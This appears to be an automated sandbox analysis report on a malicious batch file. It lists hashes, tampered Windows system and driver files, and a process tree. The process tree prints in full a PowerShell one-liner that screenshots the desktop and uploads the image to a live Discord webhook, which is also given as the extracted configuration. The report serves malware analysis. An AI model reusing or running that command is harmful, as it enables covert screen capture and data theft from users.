Analysis
- max time kernel: 60s
- max time network: 17s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 03/06/2024, 01:48
Static task: static1
Behavioral task: behavioral1
  Sample: dont run this.bat
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: dont run this.bat
  Resource: win10v2004-20240508-en
General
- Target: dont run this.bat
- Size: 1013B
- MD5: b4b00681eae6600fb830308d762457fd
- SHA1: d2d11d34e7c91bf486833265adade5769f406618
- SHA256: 01c29ea7e2b4ddecf7ba8a1044c8238a7a1e9bc98f2a5ffa33f43390fcedbe28
- SHA512: d4b4358580da3018436a9a34ec151f9912cc1675edb9474094570ca6aef4e427bf15de28f24f354a9b8cb0554c094f5c941e6461dc350fcad45ac9770b338209
Malware Config
- Extracted: https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A
Signatures
- Drops file in Drivers directory (64 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\drivers\UMDF\en-US\WUDFUsbccidDriver.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\es-ES\amdk8.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\es-ES\nwifi.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\it-IT\usbhub.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ja-JP\umbus.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ksecdd.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\modem.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\lltdio.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\UMDF\es-ES\WpdMtpDr.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\videoprt.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ksthunk.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\bthenum.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\kbdclass.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\es-ES\i8042prt.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\fr-FR\nwifi.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\fr-FR\rdvgkmd.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ja-JP\kbdhid.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\MTConfig.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\wdf01000.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\es-ES\parport.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\bthpan.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\cdrom.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\ohci1394.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\es-ES\umbus.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\fr-FR\BrSerId.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\volsnap.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\es-ES\rdbss.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ja-JP\atikmdag.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ja-JP\vhdmp.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\nsiproxy.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\srv2.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\volmgrx.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\fr-FR\tsusbflt.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\watchdog.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\mountmgr.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\modem.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\ndis.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ja-JP\ndiscap.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\UMDF\it-IT\WpdMtpDr.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\netbios.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\asyncmac.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\mouclass.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\mountmgr.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\fr-FR\intelppm.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\it-IT\pnpmem.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ja-JP\ULIAGPKX.SYS.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\it-IT\luafv.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\fr-FR\fvevol.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\tcpipreg.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\processr.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\rdbss.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\fltmgr.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\luafv.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\sermouse.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\en-US\tpm.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\agilevpn.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\it-IT\volmgrx.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\ja-JP\processr.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\rdpbus.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\de-DE\umbus.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\es-ES\kbdhid.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\es-ES\tpm.sys.mui | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\fltMgr.sys | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\fr-FR\pnpmem.sys.mui | cmd.exe
- Manipulates Digital Signatures (1 IoCs)
  Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
  description | ioc | Process
  File opened for modification | C:\Windows\System32\wintrust.dll | cmd.exe
- Drops file in System32 directory (64 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PR116F~1.INF\Amd64\RIAGAP3.GPD | cmd.exe
  File opened for modification | C:\Windows\System32\es-ES\nltest.exe.mui | cmd.exe
  File opened for modification | C:\Windows\System32\es-ES\VaultSysUi.exe.mui | cmd.exe
  File opened for modification | C:\Windows\System32\ja-JP\compstui.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\ja-JP\Licenses\_Default\StarterN\license.rtf | cmd.exe
  File opened for modification | C:\Windows\System32\dmrc.dll | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PRNEP3~1.INF\prnep304.PNF | cmd.exe
  File opened for modification | C:\Windows\System32\wbem\de-DE\rdpcore.mfl | cmd.exe
  File opened for modification | C:\Windows\System32\wbem\p2p-crp.mof | cmd.exe
  File opened for modification | C:\Windows\System32\WINDOW~1\v1.0\en-US\about_split.help.txt | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PRNKY0~3.INF\Amd64\KYKM2550.GPD | cmd.exe
  File opened for modification | C:\Windows\System32\migwiz\DLMANI~1\PeerToPeerIdManager-DL.man | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\ja-JP\SCRAWPDO.inf_loc | cmd.exe
  File opened for modification | C:\Windows\System32\en-US\winmm.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\it-IT\snmptrap.exe.mui | cmd.exe
  File opened for modification | C:\Windows\System32\wbem\es-ES\polproc.mfl | cmd.exe
  File opened for modification | C:\Windows\System32\wpcsvc.dll | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\en-US\brmfcmdm.inf_loc | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\MDMSON~1.INF\mdmsonyu.inf | cmd.exe
  File opened for modification | C:\Windows\System32\it-IT\microsoft-windows-hal-events.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\en-US\puiapi.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\it-IT\BthpanContextHandler.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\fr-FR\mmcss.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\fr-FR\WFSR.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PRD56E~1.INF\Amd64\EP0NGX9A.GPD | cmd.exe
  File opened for modification | C:\Windows\System32\es-ES\racpldlg.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PH550B~1.INF\Ph3xIB64.sys | cmd.exe
  File opened for modification | C:\Windows\System32\fr-FR\pdhui.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\ja-JP\ctfmon.exe.mui | cmd.exe
  File opened for modification | C:\Windows\System32\migwiz\DLMANI~1\Printing-Spooler-Networkclient-DL.man | cmd.exe
  File opened for modification | C:\Windows\System32\wbem\es-ES\p2p-collab.mfl | cmd.exe
  File opened for modification | C:\Windows\System32\WINDOW~1\v1.0\fr-FR\about_Arithmetic_Operators.help.txt | cmd.exe
  File opened for modification | C:\Windows\System32\de-DE\wlangpui.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\NETL1C~1.INF\netl1c64.PNF | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\WI277A~1.INF\CNFRA5.ICC | cmd.exe
  File opened for modification | C:\Windows\System32\it-IT\credwiz.exe.mui | cmd.exe
  File opened for modification | C:\Windows\System32\de-DE\els.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\de-DE\shimgvw.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PRCFC8~1.INF\prnlx00w.cat | cmd.exe
  File opened for modification | C:\Windows\System32\en-US\wevtapi.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\oobe\de-DE\setup.exe.mui | cmd.exe
  File opened for modification | C:\Windows\System32\taskhost.exe | cmd.exe
  File opened for modification | C:\Windows\System32\adsnt.dll | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PRNIN0~1.INF\Amd64\IF3350B.GPD | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\es-ES\netrast.inf_loc | cmd.exe
  File opened for modification | C:\Windows\System32\wavemsp.dll | cmd.exe
  File opened for modification | C:\Windows\System32\de-DE\printui.exe.mui | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PR5B5F~1.INF\Amd64\CNBSQ4.DLL | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PRNHP0~2.INF\Amd64\hphp915t.exp | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PR0780~1.INF\prnlx00z.PNF | cmd.exe
  File opened for modification | C:\Windows\System32\en-US\wwancfg.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\it-IT\bootstr.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\de-DE\autochk.exe.mui | cmd.exe
  File opened for modification | C:\Windows\System32\de-DE\L2SecHC.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\ja-JP\cdosys.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\en-US\prnca00e.inf_loc | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\MEMORY~1.INF\pnpmem.sys | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PRNBR0~4.INF\Amd64\BRDP383C.GPD | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\PRNNR0~3.INF\Amd64\NRMPC303.PPD | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\WPDCOM~2.INF\Wpdcomp.dll | cmd.exe
  File opened for modification | C:\Windows\System32\es-ES\seclogon.dll.mui | cmd.exe
  File opened for modification | C:\Windows\System32\Boot\en-US\winload.efi.mui | cmd.exe
  File opened for modification | C:\Windows\System32\DRIVER~1\de-DE\V_MSCDSC.inf_loc | cmd.exe
  File opened for modification | C:\Windows\System32\WINDOW~1\v1.0\ja-JP\about_Continue.help.txt | cmd.exe
- Modifies termsrv.dll (1 TTPs, 1 IoCs)
  Commonly used to allow simultaneous RDP sessions.
  description | ioc | Process
  File opened for modification | C:\Windows\System32\termsrv.dll | cmd.exe
- Command and Scripting Interpreter: PowerShell (2 IoCs)
  pid | Process
  3052 | powershell.exe
  2700 | powershell.exe
- Delays execution with timeout.exe (7 IoCs)
  pid | Process
  1988 | timeout.exe
  2316 | timeout.exe
  2556 | timeout.exe
  2628 | timeout.exe
  2536 | timeout.exe
  1188 | timeout.exe
  2840 | timeout.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid | Process
  3052 | powershell.exe
  2700 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 3052 | powershell.exe
  Token: SeDebugPrivilege | 2700 | powershell.exe
- Suspicious use of WriteProcessMemory (42 IoCs)
  description | pid | Process | procid_target
  PID 1888 wrote to memory of 2840 | 1888 | cmd.exe | 29
  PID 1888 wrote to memory of 2840 | 1888 | cmd.exe | 29
  PID 1888 wrote to memory of 2840 | 1888 | cmd.exe | 29
  PID 1888 wrote to memory of 2968 | 1888 | cmd.exe | 30
  PID 1888 wrote to memory of 2968 | 1888 | cmd.exe | 30
  PID 1888 wrote to memory of 2968 | 1888 | cmd.exe | 30
  PID 1888 wrote to memory of 1988 | 1888 | cmd.exe | 31
  PID 1888 wrote to memory of 1988 | 1888 | cmd.exe | 31
  PID 1888 wrote to memory of 1988 | 1888 | cmd.exe | 31
  PID 1888 wrote to memory of 2600 | 1888 | cmd.exe | 33
  PID 1888 wrote to memory of 2600 | 1888 | cmd.exe | 33
  PID 1888 wrote to memory of 2600 | 1888 | cmd.exe | 33
  PID 1888 wrote to memory of 2316 | 1888 | cmd.exe | 34
  PID 1888 wrote to memory of 2316 | 1888 | cmd.exe | 34
  PID 1888 wrote to memory of 2316 | 1888 | cmd.exe | 34
  PID 1888 wrote to memory of 2520 | 1888 | cmd.exe | 36
  PID 1888 wrote to memory of 2520 | 1888 | cmd.exe | 36
  PID 1888 wrote to memory of 2520 | 1888 | cmd.exe | 36
  PID 1888 wrote to memory of 2556 | 1888 | cmd.exe | 38
  PID 1888 wrote to memory of 2556 | 1888 | cmd.exe | 38
  PID 1888 wrote to memory of 2556 | 1888 | cmd.exe | 38
  PID 1888 wrote to memory of 2624 | 1888 | cmd.exe | 39
  PID 1888 wrote to memory of 2624 | 1888 | cmd.exe | 39
  PID 1888 wrote to memory of 2624 | 1888 | cmd.exe | 39
  PID 1888 wrote to memory of 2628 | 1888 | cmd.exe | 40
  PID 1888 wrote to memory of 2628 | 1888 | cmd.exe | 40
  PID 1888 wrote to memory of 2628 | 1888 | cmd.exe | 40
  PID 1888 wrote to memory of 2564 | 1888 | cmd.exe | 42
  PID 1888 wrote to memory of 2564 | 1888 | cmd.exe | 42
  PID 1888 wrote to memory of 2564 | 1888 | cmd.exe | 42
  PID 1888 wrote to memory of 2536 | 1888 | cmd.exe | 44
  PID 1888 wrote to memory of 2536 | 1888 | cmd.exe | 44
  PID 1888 wrote to memory of 2536 | 1888 | cmd.exe | 44
  PID 1888 wrote to memory of 3052 | 1888 | cmd.exe | 45
  PID 1888 wrote to memory of 3052 | 1888 | cmd.exe | 45
  PID 1888 wrote to memory of 3052 | 1888 | cmd.exe | 45
  PID 1888 wrote to memory of 1188 | 1888 | cmd.exe | 47
  PID 1888 wrote to memory of 1188 | 1888 | cmd.exe | 47
  PID 1888 wrote to memory of 1188 | 1888 | cmd.exe | 47
  PID 1888 wrote to memory of 2700 | 1888 | cmd.exe | 49
  PID 1888 wrote to memory of 2700 | 1888 | cmd.exe | 49
  PID 1888 wrote to memory of 2700 | 1888 | cmd.exe | 49
Processes
- C:\Windows\system32\cmd.exe
  Command: cmd /c "C:\Users\Admin\AppData\Local\Temp\dont run this.bat"
  PID: 1888
  Signatures: Drops file in Drivers directory; Manipulates Digital Signatures; Drops file in System32 directory; Modifies termsrv.dll; Suspicious use of WriteProcessMemory
  Children:
    - C:\Windows\system32\timeout.exe
      Command: timeout /t 3
      PID: 2840
      Signatures: Delays execution with timeout.exe
    - C:\Windows\system32\cmd.exe
      Command: cmd /k "call :spam"
      PID: 2968
    - C:\Windows\system32\timeout.exe
      Command: timeout /t 1
      PID: 1988
      Signatures: Delays execution with timeout.exe
    - C:\Windows\system32\cmd.exe
      Command: cmd /k "call :spam"
      PID: 2600
    - C:\Windows\system32\timeout.exe
      Command: timeout /t 1
      PID: 2316
      Signatures: Delays execution with timeout.exe
    - C:\Windows\system32\cmd.exe
      Command: cmd /k "call :spam"
      PID: 2520
    - C:\Windows\system32\timeout.exe
      Command: timeout /t 1
      PID: 2556
      Signatures: Delays execution with timeout.exe
    - C:\Windows\system32\cmd.exe
      Command: cmd /k "call :spam"
      PID: 2624
    - C:\Windows\system32\timeout.exe
      Command: timeout /t 1
      PID: 2628
      Signatures: Delays execution with timeout.exe
    - C:\Windows\system32\cmd.exe
      Command: cmd /k "call :spam"
      PID: 2564
    - C:\Windows\system32\timeout.exe
      Command: timeout /t 1
      PID: 2536
      Signatures: Delays execution with timeout.exe
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"
      PID: 3052
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\timeout.exe
      Command: timeout /t 3
      PID: 1188
      Signatures: Delays execution with timeout.exe
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"
      PID: 2700
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\05PGI397H7NRNXQIRG02.temp
  Filesize: 7KB
  MD5: d465fd2563ed5b9dfe253513e7b4899a
  SHA1: ec6170be9189e497870cdffcc2a8e30412b4f396
  SHA256: 348d830681605d3f550b549cf710a5d3450bfc4708dcfd5a950b8b9fba86b328
  SHA512: 6eb733c2ac7a84c1fc01e802f086700f4673ac129821df2894a4eeacb853400aab170983ab3097dae822a1a9bb3cc066af4e07ab14f393d636b431650f5cf437
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 6ae567368f5b9f323d5460e85e9e76a5
  SHA1: b73764d0136c63faa49f2049b368d7d6c76282a6
  SHA256: 2c5a99a85e4870fb867ac27e150a642b6e28f7db35250a9e3c0c55650738a45c
  SHA512: 9ba3f8de6be3ef208b5b3bc1a4b18db2b43c9b32ffedc2849d1cb3a5f8bff98c1a524a060d8883f9c24fdcef060e1aa8950a157a835f45a99fef3a55edc10523